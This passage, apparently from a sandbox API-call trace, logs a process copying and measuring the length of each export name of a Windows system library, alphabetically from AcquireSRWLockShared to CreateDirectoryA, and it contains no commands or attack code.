out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.482] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.482] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.482] lstrlenA (lpString="ADDATOMA") returned 8 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.482] lstrlenA (lpString="ADDATOMW") returned 8 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.482] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.482] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.482] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.482] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.482] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.482] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.482] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.482] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.482] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.482] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.483] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.483] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.483] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.483] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.483] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.483] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.483] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.483] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.483] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.483] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.483] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.483] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.483] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.483] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.483] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.483] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.483] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.483] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.483] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.484] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.484] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.484] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.484] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.484] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.484] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.484] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.484] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.484] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.484] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.484] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.484] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.484] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.484] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.484] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.484] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.484] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.484] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.484] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.485] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.485] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.485] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.485] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.485] lstrlenA (lpString="BEEP") returned 4 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.485] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.485] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.485] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.485] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.485] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.485] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.485] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.485] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.485] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.485] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.485] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.485] lstrlenA (lpString="CANCELIO") returned 8 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.485] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.485] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.486] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.486] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.486] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.486] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.486] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.486] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.486] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.486] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.486] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.486] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.486] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.486] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.486] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.486] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.486] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.486] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.486] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.486] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.486] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.486] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.487] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.487] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.487] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.487] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.487] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.487] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.487] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.487] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.487] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.487] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.487] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.487] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.487] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.487] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.487] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.487] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.487] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.488] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.488] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.488] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.488] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.488] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.488] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.488] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.488] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.488] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.488] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.488] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.488] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.488] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.488] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.488] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.488] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.488] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.488] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.488] lstrlenA (lpString="COPYFILEA") returned 9 [0083.488] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.488] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.488] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.489] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.489] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.489] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.489] lstrlenA (lpString="COPYFILEW") returned 9 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.489] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.489] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.489] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.489] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.489] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.489] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.489] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.489] lstrcpyA (in: lpString1=0x3f2d468, 